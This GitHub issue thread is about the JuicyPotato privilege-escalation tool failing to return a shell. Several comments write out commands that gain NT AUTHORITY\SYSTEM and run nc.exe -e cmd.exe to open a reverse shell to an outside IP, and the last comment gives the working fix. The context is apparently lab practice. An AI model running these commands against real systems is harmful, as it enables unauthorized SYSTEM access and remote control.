### ISSUE TITLE
[+] CreateProcessWithTokenW OK  but no shell

### ISSUE THREAD

**Issue by 0xm4ud** [ohpe/juicy-potato#13]
after everything runs is doesnt executes the file i give
./juicypotato.exe -l 1234 -p C:\Users\Destitute\appdata\local\temp\nc.exe -a "cmd.exe 10.10.18.93 9005" -t * -c '{E48EDA45-43C6-48e0-9323-A7B2067D9CD5}'
Testing {7D096C5F-AC08-4F1F-BEB7-5C22C517CE39} 1234                                                
......                                           
[+] authresult 0                                 
{7D096C5F-AC08-4F1F-BEB7-5C22C517CE39};NT AUTHORITY\SYSTEM                                                                                                                                             

[+] CreateProcessWithTokenW OK        

after that nothing happens, ive tried given diferent bat  files whatnot.. can anyone point me a better direction !

**Comment by pedroguerrap2002** [comment]
you forgot the '-e' in the nectar syntax... >> ./juicypotato.exe -l 1234 -p C:\Users\Destitute\appdata\local\temp\nc.exe -a "**-e** cmd.exe 10.10.18.93 9005" -t * -c '{E48EDA45-43C6-48e0-9323-A7B2067D9CD5}'

**Comment by secfung** [comment]
Hihi, I got the same issue which I could not get the shell.

![Screenshot 2022-01-27 at 23 44 15](https://user-images.githubusercontent.com/83718158/151393045-4ab6b606-a9bb-4d21-8479-954cf943bb4b.png)

1.exe = juicypotato
rev.bat:
![image](https://user-images.githubusercontent.com/83718158/151393210-23ff606d-4548-479f-bd46-6359ce926cc6.png)

I tried below:
1. Different CLSID
2. nc.exe or nc64.exe
3. Try different netcat destination port
4. Directly execute rev.bat and it could get the shell

![image](https://user-images.githubusercontent.com/83718158/151393481-bcc915c1-bfd0-4a81-882a-e362282f052b.png)

![image](https://user-images.githubusercontent.com/83718158/151393539-7ec2f0c6-c509-478d-81c8-6b8a3a9f73fe.png)

Already spent 3 hours to test and search but no luck. Any clue on this? thank you!

**Comment by yichunhuang** [comment]
Having the same issue as @secfung, did you manage to solve it?

**Comment by daMatz** [comment]
I have the same issue as @secfung and @yichunhuang.

Any solutions in the meantime? Did you guys figure out anything?

**Comment by hkm67** [comment]
I know this issue is closed, but I just want to share what I found so far:

So I was facing a similar issue when I was playing with a vulnerable box, where I also get the "CreateProcessWithTokenW OK" respond.

```
JuicyPotato.exe -p C:\Temp\nc.exe -a "-e C:\Windows\System32\cmd.exe 10.10.14.16 5555" -t t -l 1337 -c {4991d34b-80a1-4291-83b6-3328366b9097}
```

This returns:
```
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 1337
....
[+] authresult 0
{4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK
```
However, no shell was returned to my Netcat listener on port 5555.

I then attempted to troubleshoot by calling the cmd to create a text file instead:
```
JuicyPotato.exe -p C:\Windows\System32\cmd.exe -a "/c whoami > C:\Temp\test.txt" -t t -l 1337 -c {4991d34b-80a1-4291-83b6-3328366b9097}
```
And guess what - it works! The test.txt returns `nt authority\system`, which means that the exploit actually worked and the issue is most likely on nc.exe.

After another 2 hours of experimenting, I finally got the reverse shell to work by calling CMD to call nc.exe:
```
JuicyPotato.exe -p C:\Windows\System32\cmd.exe -a "C:\Temp\nc.exe -e cmd.exe 10.10.14.16 5555" -t t -l 1337 -c {4991d34b-80a1-4291-83b6-3328366b9097}
```
And this time it successfully connected to my netcat listener.

To conclude - My guess is it may be something related to JuicyPotato not able to directly execute the Netcat.exe, and it can only execute cmd.exe to then call another application with SYSTEM privilege. Hope that helps after 4 years!
